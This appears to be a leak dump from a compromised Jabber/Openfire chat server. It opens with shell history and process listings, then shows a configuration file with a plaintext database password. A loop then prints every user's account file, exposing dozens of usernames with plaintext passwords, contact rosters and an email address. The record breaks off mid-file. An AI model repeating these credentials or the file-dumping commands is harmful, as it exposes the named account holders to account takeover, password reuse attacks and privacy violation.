+ps aux +kill 3184 +jabberd -h jabber-swissfaking.net +cd .. +ls-l +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +cd .. +default +cd default +vi jabber-muc +cd .. +cd jabber +ls -l +vi jabber.xml +netstat -tlun +cd .. +cd .. +cd var +cd run +cd jabber +ps aux +kill 18354 +jabberd -h jabber-swissfaking.net +cd.. +cd .. +cd etc +cd jabber +ls -l +cd jabber.d +ls -l +jabber-jud +jabber-jud -h +cd jabber-jud +jabber-jud +jabber-jud -h jabber-swissfaking.net +cd .. +cd . +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ps aux +cd /usr/lib/jvm/ja +cd usr +cd .. +cd usr +cd lib +cd ... +cd .. +cd .. +cd etc +ls -l +cd init.d +ls -l +openfire restart +openfire restart +cd openfir +openfire stop +sudo /etc/init.d/openfire restart +ls -l +cd .. 
+cd /usr/share/openfire +ls -l +cd lib +ls -l +ps aux +cd /usr/sbin/jabberd +cd /usr/sbin/jabberd +cd /usr/sbin/ +ls -l +ps aux +kill 7313 +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +kill 13651 +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +ps aux +ps aux +ps aux +sudo /etc/init.d/openfire start +ps aux +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +kill 13754 +ps aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +kill 26588 +sudo /etc/init.d/openfire restart +cd .. +ls - +ls -l +cd etc +ls -l +cd jabber +ls -l +del +rm jabber.xml +rm jabber.d +rm jabber.cfg +rm jabber-muc.xml +rm jabber-jud.xml +ls -l +cd jabber.d +ls -l +rm jabber-jud +rm jabber-muc +ls -l +cd .. +ls -l +rmdir jabber.d +ls -l +cd .. +ls -l +cd .. +cd var +cd run +ls -l +rm jabber +cd jabber +ls -l +cd .. +ls -l +cd .. +ls -l +cd +ls -l +cd .. +ls -l +ps aux +cd.. +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps-aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +cd .. +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +sudo /etc/init.d/openfire restart +sensor + +# ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.1 1980 688 ? Ss 2010 0:05 init [2] +openfire 1703 0.0 25.0 342352 131124 ? Sl Jan03 4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us +root 3392 0.0 0.1 1692 616 ? Ss 2010 0:00 /sbin/syslogd +108 3399 0.0 0.1 2480 860 ? Ss 2010 0:00 /usr/bin/dbus-daemon --system +avahi 3410 0.0 0.2 2876 1432 ? Ss 2010 0:00 avahi-daemon: running [jabbersw.local] +avahi 3411 0.0 0.0 2744 452 ? Ss 2010 0:00 avahi-daemon: chroot helper +root 3417 0.0 0.1 5272 1032 ? Ss 2010 0:00 /usr/sbin/sshd +www-data 3632 0.0 1.1 38240 6232 ? S Jan02 0:00 /usr/sbin/apache2 -k start +postgres 3750 0.0 0.9 40668 4960 ? 
S 2010 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf +postgres 5193 0.0 1.2 40668 6540 ? Ss 2010 0:04 postgres: writer process +postgres 5194 0.0 0.2 40668 1288 ? Ss 2010 0:02 postgres: wal writer process +postgres 5195 0.0 0.2 40808 1424 ? Ss 2010 0:01 postgres: autovacuum launcher process +postgres 5196 0.0 0.2 11988 1192 ? Ss 2010 0:05 postgres: stats collector process +root 5230 0.0 0.1 108572 940 ? Ssl 2010 0:00 /usr/sbin/nscd +root 5262 0.0 0.1 2912 820 ? Ss 2010 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6 +root 5279 0.0 0.1 2036 688 ? Ss 2010 0:00 /usr/sbin/cron +root 5430 0.0 2.3 37740 12556 ? Ss 2010 0:00 /usr/sbin/apache2 -k start +postgres 7792 0.0 1.2 41992 6744 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43823) idle +postgres 7801 0.0 1.1 41916 6044 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43824) idle +postgres 7802 0.0 1.2 41980 6300 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43825) idle +postgres 7803 0.0 1.2 41976 6296 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43826) idle +postgres 13420 0.0 1.2 41988 6720 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43907) idle +www-data 17911 0.0 1.1 38236 6220 ? S Jan03 0:00 /usr/sbin/apache2 -k start +root 22036 0.0 0.1 2296 776 pts/0 R+ 07:10 0:00 ps aux +www-data 26577 0.0 1.1 38240 6236 ? S Jan02 0:00 /usr/sbin/apache2 -k start +root 30105 0.0 0.2 2760 1408 pts/0 Ss 07:04 0:00 -bash + +# cd /usr/share/openfire && ls -la +total 20 +drwxr-x--- 5 openfire openfire 4096 Jan 3 00:49 . +drwxr-xr-x 114 root root 4096 Aug 9 02:02 .. 
+lrwxrwxrwx 1 openfire openfire 13 Aug 9 02:02 conf -> /etc/openfire +lrwxrwxrwx 1 openfire openfire 29 Aug 9 02:02 embedded-db -> /var/lib/openfire/embedded-db +drwxr-x--- 2 openfire openfire 4096 Aug 9 02:02 lib +lrwxrwxrwx 1 openfire openfire 17 Aug 9 02:02 logs -> /var/log/openfire +drwxr-xr-x 3 openfire openfire 4096 Jan 3 00:49 monitoring +lrwxrwxrwx 1 openfire openfire 25 Aug 9 02:02 plugins -> /var/lib/openfire/plugins +drwxr-x--- 3 openfire openfire 4096 Aug 9 02:02 resources + +# cd conf && ls -la +total 32 +drwxr-x--- 3 openfire openfire 4096 Jan 6 16:40 . +drwxr-xr-x 84 root root 4096 Jan 3 01:45 .. +-rw-r--r-- 1 openfire openfire 9403 Jan 6 16:40 available-plugins.xml +-rw-r--r-- 1 openfire openfire 1876 Jan 3 00:51 openfire.xml +drwxr-x--- 2 openfire openfire 4096 Jan 3 01:31 security +-rw-r--r-- 1 openfire openfire 11 Jan 6 16:40 server-update.xml + +# cat openfire.xml + + + + + + + + 9618 + 9619 + + de + + + + org.jivesoftware.database.DefaultConnectionProvider + + + + org.postgresql.Driver + jdbc:postgresql://localhost:5432/openfire + openfire + pass123 + select 1 + true + true + 5 + 25 + 1.0 + + + true + + + false + + + + +# cd /var/lib/jabber && ls -la +total 12 +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 . +drwxr-xr-x 27 root root 4096 Aug 9 02:02 .. +drwx------ 2 root root 4096 Aug 9 01:34 jabber-swissfaking.net + +# cd jabber-swissfaking.net && ls -la +total 192 +drwx------ 2 root root 4096 Aug 9 01:34 . +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 .. 
+-rw------- 1 root root 1332 Aug 4 16:46 afroman.xml +-rw------- 1 root root 1387 Aug 8 15:38 babypanda.xml +-rw------- 1 root root 411 Aug 4 00:03 basics.xml +-rw------- 1 root root 976 Aug 3 15:31 batonde.xml +-rw------- 1 root root 9717 Aug 8 21:56 bullddoser.xml +-rw------- 1 root root 845 Aug 3 17:44 cr4ck.xml +-rw------- 1 root root 9791 Aug 8 15:16 crankz.xml +-rw------- 1 root root 391 Aug 3 15:43 cryten.xml +-rw------- 1 root root 906 Aug 7 19:39 darkfunny.xml +-rw------- 1 root root 596 Aug 8 17:47 dotsyn.xml +-rw------- 1 root root 564 Aug 4 16:47 el!t3.xml +-rw------- 1 root root 2177 Aug 8 23:08 fickmaus.xml +-rw------- 1 root root 391 Aug 4 23:26 flash.xml +-rw------- 1 root root 1428 Aug 5 16:17 freakout.xml +-rw------- 1 root root 1201 Aug 8 23:20 glycerin\40jabber-swissfaking.net.xml +-rw------- 1 root root 787 Aug 4 14:37 hackthenet.xml +-rw------- 1 root root 1300 Aug 5 16:17 hans-wurst.xml +-rw------- 1 root root 390 Aug 5 00:59 holzmen.xml +-rw------- 1 root root 636 Aug 7 23:25 jamyla\40jabber-swissfaking.net.xml +-rw------- 1 root root 393 Jul 30 22:10 kappy777.xml +-rw------- 1 root root 392 Aug 5 15:38 kluless.xml +-rw------- 1 root root 424 Aug 9 00:55 luigi100.xml +-rw------- 1 root root 794 Aug 8 15:39 naik.xml +-rw------- 1 root root 390 Aug 8 16:36 nitex.xml +-rw------- 1 root root 699 Aug 8 22:16 racketeer.xml +-rw------- 1 root root 992 Aug 5 16:17 s0xtech.xml +-rw------- 1 root root 392 Aug 3 23:16 sinned.xml +-rw------- 1 root root 20723 Aug 5 16:27 st3ffl0r.xml +-rw------- 1 root root 2325 Aug 8 03:49 syntax\40jabber-swissfaking.net.xml +-rw------- 1 root root 645 Aug 9 01:12 syntex.xml +-rw------- 1 root root 724 Aug 8 15:39 theird21.xml +-rw------- 1 root root 1754 Aug 8 15:38 the|biggie.xml +-rw------- 1 root root 1764 Aug 9 01:34 trickz.xml +-rw------- 1 root root 409 Aug 3 20:22 w!cked.xml +-rw------- 1 root root 396 Aug 8 03:12 w00dka.xml +-rw------- 1 root root 1324 Aug 5 05:06 weareone.xml +-rw------- 1 root root 547 Aug 8 
18:22 yaboybigt.xml + +# for file in *; do echo $file; cat $file; echo -e "\n"; done +afroman.xml +JGMlms91afromanregisteredFriendsFriendsFriendsFriends + +babypanda.xml +BTYM8hbabypandaBabyPandaregisteredDisconnectedFriendsFriendsFriendsFriends + +basics.xml +nicki123!basicsregisteredDisconnected + +batonde.xml +1asdfghjklbatonderegistered\roster:delimiterReplaced by new connectionbatonde<ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +bullddoser.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/> +<GIVEN/> +<MIDDLE/> +</N> +<ORG><ORGNAME/> +<ORGUNIT/> +</ORG> +<FN/> +<URL/> +<TITLE/> +<NICKNAME/> +<PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO> +<EMAIL><HOME/><INTERNET/><PREF/><USERID/> +</EMAIL> +<TEL><PAGER/><WORK/><NUMBER/> +</TEL> +<TEL><CELL/><WORK/><NUMBER/> +</TEL> +<TEL><VOICE/><WORK/><NUMBER/> +</TEL> +<TEL><FAX/><WORK/><NUMBER/> +</TEL> +<TEL><PAGER/><HOME/><NUMBER/> +</TEL> +<TEL><CELL/><HOME/><NUMBER/> +</TEL> +<TEL><VOICE/><HOME/><NUMBER/> +</TEL> +<TEL><FAX/><HOME/><NUMBER/> +</TEL> +<ADR><WORK/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +<ADR><HOME/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +</vCard><query 
xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +cr4ck.xml +<xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'> + <subject>Welcome!</subject> + <body>Welcome to the Jabber server -- we hope you enjoy this service! 
For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body> + <x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb> + +crankz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +cryten.xml 
+<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb> + +darkfunny.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' subscribe=''><group>Friends</group></item></query></xdb> + +dotsyn.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +el!t3.xml +<xdb><password xmlns='jabber:iq:auth' 
xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +fickmaus.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' 
subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb> + +flash.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb> + +freakout.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' 
name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +glycerin\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb> + +hackthenet.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query 
xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb> + +hans-wurst.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' 
subscription='from'/></query></xdb> + +holzmen.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb> + +jamyla\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb> + +kappy777.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb> + +kluless.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb> + +luigi100.xml +<xdb><password xmlns='jabber:iq:auth' 
xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +naik.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +nitex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb> + +racketeer.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item 
jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +s0xtech.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' 